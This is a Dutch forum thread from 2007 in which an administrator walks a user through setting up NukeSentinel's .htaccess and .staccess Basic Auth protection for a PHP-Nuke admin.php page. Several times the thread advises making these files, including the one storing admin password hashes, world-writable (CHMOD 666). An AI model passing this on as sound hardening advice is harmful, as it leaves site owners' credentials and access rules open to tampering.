Eentje in de root van mijn site die helemaal leeg is en eentje in de map abuse in de directory waar mijn site draait, daar staat alleen in allow all. Dus welke moet ik nu nemen vraag ik me af en wat moet ik nu in dit bestand zetten?


Je zal er wanneer je alle mappen doorspit meerdere vinden. Dit is ter beveiliging/toegang geven tot/toegang weigeren van die mappen.

cobra_gerard wrote:

En moet ik ook in Sentinel dan het path invoeren of niet? En het bestand staaccess als ik in Sentinel de setup aanklik krijg ik een melding:

Save this in :

# -------------------------------------------
# Start of NukeSentinel(tm) admin.php Auth
# -------------------------------------------
<Files >
deny from all
</Files>

<Files admin.php>
<Limit GET POST PUT>
require valid-user
</Limit>
AuthName "Restricted by NukeSentinel(tm)"
AuthType Basic
AuthUserFile
</Files>
# -------------------------------------------
# End of NukeSentinel(tm) admin.php Auth
# -------------------------------------------

wat moet ik hiermee doen? Moet ik dit zetten in de map Abuse in het htaccess bestand?


Als eerste klopt bovenstaande niet. Er ontbreekt achter AuthUserFile het pad naar het .staccess bestand.
Ten tweede, hoe je te werk moet gaan (Admin CGIAuth):

1.
CHMOD de bestanden .htaccess, .staccess en eventueel .ftaccess naar 666 (rw-rw-rw).

2.
Log in als admin op je website

3.
Ga in je admin panel naar NukeSentinel

4.
Kies in het menu voor "Scan For New Admins"

5.
Ga naar "Admin Auth List" en controleer of alle bij elke admin het "Auth Password" op Set en "Protected" op Yes staat. Controleer middels Edit het password wat is opgeslagen. Dit is het password voor de extra Authenticatie (het popup venster!)

6.
Als punt 5 correct is dan staat boven dat tabelletje met Admins het volgende:
Build CGIAuth file: /pad/naar/jouw/webspace/public_html/.staccess
of iets dergelijks.
Klik hierop. Let op: Je .staccess moet wel beschrijfbaar zijn! Vandaar CHMOD 666.
In het .staccess bestand worden nu de admins met hun gecodeerde password opgeslagen.

7.
Terug naar NukeSentinel Administration.
Zorg dat de paden naar .htaccess en .staccess kloppen, en kies voor "Save Changes"

8.
Onder "Administrative Settings" staat de instelling "staccess Path" met daaronder "CGIAuth Setup". Kies voor CGIAuth Setup en er wordt een nieuwe pagina geopend, waarin het volgende moet staan:

Code:

# -------------------------------------------
# Start of NukeSentinel(tm) admin.php Auth
# -------------------------------------------
<Files .staccess>
deny from all
</Files>

<Files admin.php>
<Limit GET POST PUT>
require valid-user
</Limit>
AuthName "Restricted by NukeSentinel(tm)"
AuthType Basic
AuthUserFile /pad/naar/jouw/webspace/public_html/.staccess
</Files>
# -------------------------------------------
# End of NukeSentinel(tm) admin.php Auth
# -------------------------------------------


Sla bovenstaand op in je .htaccess bestand en zorg ervoor dat er minimaal 1 (één!!) lege regel onderaan in je .htaccess bestand staat. Controleer de schrijfbaarheid (CHMOD) nogmaals. Dit moet 666 zijn.

9.
Onder "Administrative Settings" staat de instelling "Admin Auth". Hier kies je voor Admin CGIAuth, indien beschikbaar. Kies "Save Changes", en je beveiliging zou in orde moeten zijn.


cobra_gerard wrote:

@BL

heb net je admin.php gevolgd en krijg dan een pop up met de melding dat dit beveilgd is! Is wel een stuk veiliger ja Shocked


Met bovenstaande uitleg bereik jij hetzelfde Wink


BL

_________________
Te Lezen: Forum Regels | Te Gebruiken: Forum Zoek Functie
Aanbevolen PHP-Nuke versie: PHP-Nuke 7.6pl3.1!
Aanbevolen Security AddOn: Nuke Sentinel™
View user's profileSend private messageSend e-mailVisit poster's website
cobra_gerard
Gevorderd
Gevorderd


Joined: Nov 18, 2006
Posts: 127
Location: Rijsbergen

PostPosted: Sun 15 Jul 2007 20:55 Reply with quoteBack to top

1.
CHMOD de bestanden .htaccess, .staccess en eventueel .ftaccess naar 666 (rw-rw-rw).


Maar moet ik dit met alle bestanden doen die er zijn of alleen voor bepaalde directories BL?
View user's profileSend private messageVisit poster's website
BlueLion
Administrator
Administrator


Joined: Aug 21, 2004
Posts: 2836

PostPosted: Sun 15 Jul 2007 21:04 Reply with quoteBack to top

Nee, vergeet alle .htaccess bestanden die je kan vinden in alle mappen en submappen.
Welke voor jouw belangrijk zijn, en voor NukeSentinel relevant zijn de .htaccess, .staccess en .ftaccess in de root. Oftewel waar je config.php en mainfile.php ook te vinden zijn.

BL

_________________
Te Lezen: Forum Regels | Te Gebruiken: Forum Zoek Functie
Aanbevolen PHP-Nuke versie: PHP-Nuke 7.6pl3.1!
Aanbevolen Security AddOn: Nuke Sentinel™
View user's profileSend private messageSend e-mailVisit poster's website
cobra_gerard
Gevorderd
Gevorderd


Joined: Nov 18, 2006
Posts: 127
Location: Rijsbergen

PostPosted: Sun 15 Jul 2007 21:17 Reply with quoteBack to top

Pffff, zag al een hoop werk aankomen Very Happy

Maar hier staan er geen, heb ze denk ik bij de installatie van Sentinel niet de sample files geupload..... Hier ligt dat toch aan of niet BL? Ik heb die nog wel ergens, anders kan ik ze alsnog daar naartoe uploaden toch?
View user's profileSend private messageVisit poster's website
BlueLion
Administrator
Administrator


Joined: Aug 21, 2004
Posts: 2836

PostPosted: Sun 15 Jul 2007 21:21 Reply with quoteBack to top

De sample bestanden zijn standaard leeg.
Maak een tekst bestand, noem deze htaccess, upload deze naar je webspace en rename het bestand naar .htaccess, CHMOD naar 666, en klaar.
Zelfde doen voor .staccess en .ftaccess.
Windows accepteert geen bestandsnamen .htaccess bij het opslaan van een nieuw document. Vandaar zonder punt (.).

BL

_________________
Te Lezen: Forum Regels | Te Gebruiken: Forum Zoek Functie
Aanbevolen PHP-Nuke versie: PHP-Nuke 7.6pl3.1!
Aanbevolen Security AddOn: Nuke Sentinel™
View user's profileSend private messageSend e-mailVisit poster's website
cobra_gerard
Gevorderd
Gevorderd


Joined: Nov 18, 2006
Posts: 127
Location: Rijsbergen

PostPosted: Sun 15 Jul 2007 21:24 Reply with quoteBack to top

Oke BL,

wat moest ik toch zonder jouw!!!
En velen anderen trouwens ook, ga weer verder stoeien.
Bedankt Laughing
View user's profileSend private messageVisit poster's website
Display posts from previous:      
 Donaties   Adverteren 
Wilt u het forum steunen, dan kunt u nu eenvoudig doneren met PayPal.
Post new topicReply to topic
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



Powered by phpBB © 2001, 2005 phpBB Group